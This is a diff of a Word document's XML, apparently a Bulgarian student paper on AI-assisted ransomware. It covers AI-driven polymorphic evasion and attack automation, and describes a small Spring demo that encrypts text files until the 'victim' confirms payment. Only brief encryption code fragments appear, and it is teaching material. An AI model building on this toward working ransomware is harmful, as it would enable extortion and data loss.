+            <w:instrText xml:space="preserve">CITATION Bre25 \l 1033 </w:instrText>
+          </w:r>
+          <w:r>
+            <w:fldChar w:fldCharType="separate"/>
+          </w:r>
+          <w:r>
+            <w:rPr>
+              <w:noProof/>
+              <w:lang w:val="en-US"/>
+            </w:rPr>
+            <w:t>[9]</w:t>
+          </w:r>
+          <w:r>
+            <w:fldChar w:fldCharType="end"/>
+          </w:r>
+        </w:sdtContent>
+      </w:sdt>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Ето някои от начините, за които хакерите използват </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>AI:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="9"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Полиморфен</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>AI ransomware</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> - Традиционното разпознаване на </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>ransomware</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> атаките разчита на методи, за детекция на често използвани модели. За да избегнат евентуална детекция към </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>ransomware</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> се прилага </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>AI,</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> която непрестанно модифицира кода си, за да го избегне. По този начин остава незабележим за антивирусните.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="9"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Автоматизация:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> AI</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> позволява на хакерите да автоматизират и персонализират производството на </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>ransomware</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>Инструментите за автоматизация позволят бързо сканиране на уязвимости, ефикасно изпълнение на атаки и адаптация в реално време въз основа на защитните механизми. Това позволява множество атаки на различни организации едновреме</w:t>
+      </w:r>
+      <w:r>
+        <w:t>н</w:t>
+      </w:r>
+      <w:r>
+        <w:t>но.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="709"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:keepNext/>
+        <w:ind w:firstLine="709"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="02891911" wp14:editId="4B6B4122">
+            <wp:extent cx="5427980" cy="2679773"/>
+            <wp:effectExtent l="0" t="0" r="1270" b="6350"/>
+            <wp:docPr id="1971879349" name="Picture 2"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 6"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill rotWithShape="1">
+                    <a:blip r:embed="rId22">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:srcRect l="2937" t="5764" r="2797" b="5660"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5429830" cy="2680686"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                    <a:extLst>
+                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
+                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
+                      </a:ext>
+                    </a:extLst>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Caption"/>
         <w:jc w:val="left"/>
       </w:pPr>
       <w:r>
-        <w:br w:type="page"/>
+        <w:t xml:space="preserve">Фигура </w:t>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>8</w:t>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>40%</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> от фишинг атаките са генерирани от </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>AI</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4980,7 +5376,7 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="15" w:name="_Toc223385513"/>
+      <w:bookmarkStart w:id="16" w:name="_Toc223468473"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Имплементация на </w:t>
@@ -4991,7 +5387,7 @@
         </w:rPr>
         <w:t>Ransomware</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="15"/>
+      <w:bookmarkEnd w:id="16"/>
     </w:p>
     <w:p>
       <w:r>
@@ -5028,16 +5424,64 @@
         <w:t>Spring Framework.</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> Целта на имплементацията е да се покаже колко лесно може да се създаде софтуер за криптиране и декриптиране на файлове, който да се използва за </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>ransomware.</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> В демото има три текстови файла, които съдържат кратко текстово съдържанието. При стартиран на приложението се криптират, когато потребителят „плати“, тогава се декриптират обратно в текстови.</w:t>
+        <w:t xml:space="preserve"> Целта на имплементацията е да се покаже колко лесно може да се създаде софтуер за криптиране и декриптиране на файлове, който да </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">бъде </w:t>
+      </w:r>
+      <w:r>
+        <w:t>използва</w:t>
+      </w:r>
+      <w:r>
+        <w:t>н</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> за </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>ransomware</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> атаки</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> Такъв тип атака е прилаган в ранните две хилядни.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> В демото има три текстови файла</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> При стартиран</w:t>
+      </w:r>
+      <w:r>
+        <w:t>е</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> на приложението</w:t>
+      </w:r>
+      <w:r>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> се криптират</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> и</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> когато потребителят „плати“, тогава се декриптират обратно в текстови.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5282,28 +5726,18 @@
           <w:szCs w:val="20"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="16" w:name="_Toc223382614"/>
+      <w:bookmarkStart w:id="17" w:name="_Toc223382614"/>
       <w:r>
         <w:t xml:space="preserve">Фигура </w:t>
       </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="begin"/>
-      </w:r>
-      <w:r>
-        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
-      </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="separate"/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:t>8</w:t>
-      </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="end"/>
-      </w:r>
+      <w:fldSimple w:instr=" SEQ Фигура \* ARABIC ">
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>9</w:t>
+        </w:r>
+      </w:fldSimple>
       <w:r>
         <w:t>:</w:t>
       </w:r>
@@ -5313,7 +5747,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> pom.xml</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="16"/>
+      <w:bookmarkEnd w:id="17"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -5434,7 +5868,15 @@
         <w:t xml:space="preserve">    </w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">String decrypt(String </w:t>
+        <w:t xml:space="preserve">String </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>decrypt(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">String </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -5457,24 +5899,14 @@
       <w:r>
         <w:t xml:space="preserve">Фигура </w:t>
       </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="begin"/>
-      </w:r>
-      <w:r>
-        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
-      </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="separate"/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:t>9</w:t>
-      </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="end"/>
-      </w:r>
+      <w:fldSimple w:instr=" SEQ Фигура \* ARABIC ">
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>10</w:t>
+        </w:r>
+      </w:fldSimple>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
@@ -5532,6 +5964,7 @@
         <w:t xml:space="preserve">    return new </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:t>HexEncodingTextEncryptor</w:t>
       </w:r>
@@ -5547,7 +5980,11 @@
         <w:t>standard</w:t>
       </w:r>
       <w:r>
-        <w:t>(password, salt));</w:t>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>password, salt));</w:t>
       </w:r>
       <w:r>
         <w:br/>
@@ -5562,29 +5999,24 @@
       <w:r>
         <w:t xml:space="preserve">Фигура </w:t>
       </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="begin"/>
-      </w:r>
-      <w:r>
-        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
-      </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="separate"/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:t>10</w:t>
-      </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="end"/>
-      </w:r>
+      <w:fldSimple w:instr=" SEQ Фигура \* ARABIC ">
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>11</w:t>
+        </w:r>
+      </w:fldSimple>
       <w:r>
         <w:t>: Метод от класа, която се използва в демото</w:t>
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:tab/>
         <w:t xml:space="preserve">Използва </w:t>
@@ -5616,6 +6048,54 @@
       <w:r>
         <w:t>низ.</w:t>
       </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:sdt>
+        <w:sdtPr>
+          <w:rPr>
+            <w:lang w:val="en-US"/>
+          </w:rPr>
+          <w:id w:val="667292928"/>
+          <w:citation/>
+        </w:sdtPr>
+        <w:sdtContent>
+          <w:r>
+            <w:rPr>
+              <w:lang w:val="en-US"/>
+            </w:rPr>
+            <w:fldChar w:fldCharType="begin"/>
+          </w:r>
+          <w:r>
+            <w:rPr>
+              <w:lang w:val="en-US"/>
+            </w:rPr>
+            <w:instrText xml:space="preserve"> CITATION Spr \l 1033 </w:instrText>
+          </w:r>
+          <w:r>
+            <w:rPr>
+              <w:lang w:val="en-US"/>
+            </w:rPr>
+            <w:fldChar w:fldCharType="separate"/>
+          </w:r>
+          <w:r>
+            <w:rPr>
+              <w:noProof/>
+              <w:lang w:val="en-US"/>
+            </w:rPr>
+            <w:t>[10]</w:t>
+          </w:r>
+          <w:r>
+            <w:rPr>
+              <w:lang w:val="en-US"/>
+            </w:rPr>
+            <w:fldChar w:fldCharType="end"/>
+          </w:r>
+        </w:sdtContent>
+      </w:sdt>
     </w:p>
     <w:p>
       <w:pPr>
@@ -6357,7 +6837,7 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="17" w:name="_Toc223385514"/>
+      <w:bookmarkStart w:id="18" w:name="_Toc223468474"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Демонстрация на </w:t>
@@ -6368,17 +6848,17 @@
         </w:rPr>
         <w:t>Ransomware</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="17"/>
+      <w:bookmarkEnd w:id="18"/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading3"/>
       </w:pPr>
-      <w:bookmarkStart w:id="18" w:name="_Toc223385515"/>
+      <w:bookmarkStart w:id="19" w:name="_Toc223468475"/>
       <w:r>
         <w:t>Съдържание на текстовите файлове преди криптирането:</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="18"/>
+      <w:bookmarkEnd w:id="19"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -6400,24 +6880,14 @@
       <w:r>
         <w:t xml:space="preserve">Фигура </w:t>
       </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="begin"/>
-      </w:r>
-      <w:r>
-        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
-      </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="separate"/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:t>11</w:t>
-      </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="end"/>
-      </w:r>
+      <w:fldSimple w:instr=" SEQ Фигура \* ARABIC ">
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>12</w:t>
+        </w:r>
+      </w:fldSimple>
       <w:r>
         <w:t xml:space="preserve">: </w:t>
       </w:r>
@@ -6448,24 +6918,14 @@
       <w:r>
         <w:t xml:space="preserve">Фигура </w:t>
       </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="begin"/>
-      </w:r>
-      <w:r>
-        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
-      </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="separate"/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:t>12</w:t>
-      </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="end"/>
-      </w:r>
+      <w:fldSimple w:instr=" SEQ Фигура \* ARABIC ">
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>13</w:t>
+        </w:r>
+      </w:fldSimple>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
@@ -6490,24 +6950,14 @@
       <w:r>
         <w:t xml:space="preserve">Фигура </w:t>
       </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="begin"/>
-      </w:r>
-      <w:r>
-        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
-      </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="separate"/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:t>13</w:t>
-      </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="end"/>
-      </w:r>
+      <w:fldSimple w:instr=" SEQ Фигура \* ARABIC ">
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>14</w:t>
+        </w:r>
+      </w:fldSimple>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
@@ -6531,11 +6981,11 @@
       <w:pPr>
         <w:pStyle w:val="Heading3"/>
       </w:pPr>
-      <w:bookmarkStart w:id="19" w:name="_Toc223385516"/>
+      <w:bookmarkStart w:id="20" w:name="_Toc223468476"/>
       <w:r>
         <w:t>Стартиране на демото:</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="19"/>
+      <w:bookmarkEnd w:id="20"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -6589,24 +7039,14 @@
       <w:r>
         <w:t xml:space="preserve">Фигура </w:t>
       </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="begin"/>
-      </w:r>
-      <w:r>
-        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
-      </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="separate"/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:t>14</w:t>
-      </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="end"/>
-      </w:r>
+      <w:fldSimple w:instr=" SEQ Фигура \* ARABIC ">
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>15</w:t>
+        </w:r>
+      </w:fldSimple>
       <w:r>
         <w:t>: Какво се визуализира първо на потребителя</w:t>
       </w:r>
@@ -6727,24 +7167,14 @@
       <w:r>
         <w:t xml:space="preserve">Фигура </w:t>
       </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="begin"/>
-      </w:r>
-      <w:r>
-        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
-      </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="separate"/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:t>15</w:t>
-      </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="end"/>
-      </w:r>
+      <w:fldSimple w:instr=" SEQ Фигура \* ARABIC ">
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>16</w:t>
+        </w:r>
+      </w:fldSimple>
       <w:r>
         <w:t>: Симулация на атаката. Файловете са криптирани. Потребителят трябва да потвърди, че е заплатил.</w:t>
       </w:r>
@@ -6769,24 +7199,14 @@
       <w:r>
         <w:t xml:space="preserve">Фигура </w:t>
       </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="begin"/>
-      </w:r>
-      <w:r>
-        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
-      </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="separate"/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:t>16</w:t>
-      </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="end"/>
-      </w:r>
+      <w:fldSimple w:instr=" SEQ Фигура \* ARABIC ">
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>17</w:t>
+        </w:r>
+      </w:fldSimple>
       <w:r>
         <w:t xml:space="preserve">: </w:t>
       </w:r>
@@ -6820,24 +7240,14 @@
       <w:r>
         <w:t xml:space="preserve">Фигура </w:t>
       </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="begin"/>
-      </w:r>
-      <w:r>
-        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
-      </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="separate"/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:t>17</w:t>
-      </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="end"/>
-      </w:r>
+      <w:fldSimple w:instr=" SEQ Фигура \* ARABIC ">
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>18</w:t>
+        </w:r>
+      </w:fldSimple>
       <w:r>
         <w:t xml:space="preserve">: </w:t>
       </w:r>
@@ -6868,24 +7278,14 @@
       <w:r>
         <w:t xml:space="preserve">Фигура </w:t>
       </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="begin"/>
-      </w:r>
-      <w:r>
-        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
-      </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="separate"/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:t>18</w:t>
-      </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="end"/>
-      </w:r>
+      <w:fldSimple w:instr=" SEQ Фигура \* ARABIC ">
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>19</w:t>
+        </w:r>
+      </w:fldSimple>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
@@ -6919,12 +7319,12 @@
       <w:pPr>
         <w:pStyle w:val="Heading3"/>
       </w:pPr>
-      <w:bookmarkStart w:id="20" w:name="_Toc223385517"/>
+      <w:bookmarkStart w:id="21" w:name="_Toc223468477"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>Жертвата е заплатила откупа:</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="20"/>
+      <w:bookmarkEnd w:id="21"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -7024,24 +7424,14 @@
       <w:r>
         <w:t xml:space="preserve">Фигура </w:t>
       </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="begin"/>
-      </w:r>
-      <w:r>
-        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
-      </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="separate"/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:t>19</w:t>
-      </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="end"/>
-      </w:r>
+      <w:fldSimple w:instr=" SEQ Фигура \* ARABIC ">
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>20</w:t>
+        </w:r>
+      </w:fldSimple>
       <w:r>
         <w:t>: Файловете са възстановени</w:t>
       </w:r>
@@ -7071,24 +7461,14 @@
       <w:r>
         <w:t xml:space="preserve">Фигура </w:t>
       </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="begin"/>
-      </w:r>
-      <w:r>
-        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
-      </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="separate"/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:t>20</w:t>
-      </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="end"/>
-      </w:r>
+      <w:fldSimple w:instr=" SEQ Фигура \* ARABIC ">
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>21</w:t>
+        </w:r>
+      </w:fldSimple>
       <w:r>
         <w:t>:</w:t>
       </w:r>
@@ -7121,24 +7501,14 @@
       <w:r>
         <w:t xml:space="preserve">Фигура </w:t>
       </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="begin"/>
-      </w:r>
-      <w:r>
-        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
-      </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="separate"/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:t>21</w:t>
-      </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="end"/>
-      </w:r>
+      <w:fldSimple w:instr=" SEQ Фигура \* ARABIC ">
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>22</w:t>
+        </w:r>
+      </w:fldSimple>
       <w:r>
         <w:t xml:space="preserve">: </w:t>
       </w:r>
@@ -7168,24 +7538,14 @@
       <w:r>
         <w:t xml:space="preserve">Фигура </w:t>
       </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="begin"/>
-      </w:r>
-      <w:r>
-        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
-      </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="separate"/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:t>22</w:t>
-      </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="end"/>
-      </w:r>
+      <w:fldSimple w:instr=" SEQ Фигура \* ARABIC ">
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>23</w:t>
+        </w:r>
+      </w:fldSimple>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
@@ -7215,7 +7575,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading3"/>
       </w:pPr>
-      <w:bookmarkStart w:id="21" w:name="_Toc223385518"/>
+      <w:bookmarkStart w:id="22" w:name="_Toc223468478"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
@@ -7226,7 +7586,7 @@
       <w:r>
         <w:t xml:space="preserve"> към имплементацията:</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="21"/>
+      <w:bookmarkEnd w:id="22"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -7254,7 +7614,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId22">
+                    <a:blip r:embed="rId23">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -7299,7 +7659,7 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="22" w:name="_Toc223385519"/>
+      <w:bookmarkStart w:id="23" w:name="_Toc223468479"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Стратегии и защита от </w:t>
@@ -7310,7 +7670,7 @@
         </w:rPr>
         <w:t>ransomware</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="22"/>
+      <w:bookmarkEnd w:id="23"/>
     </w:p>
     <w:p>
       <w:pPr>
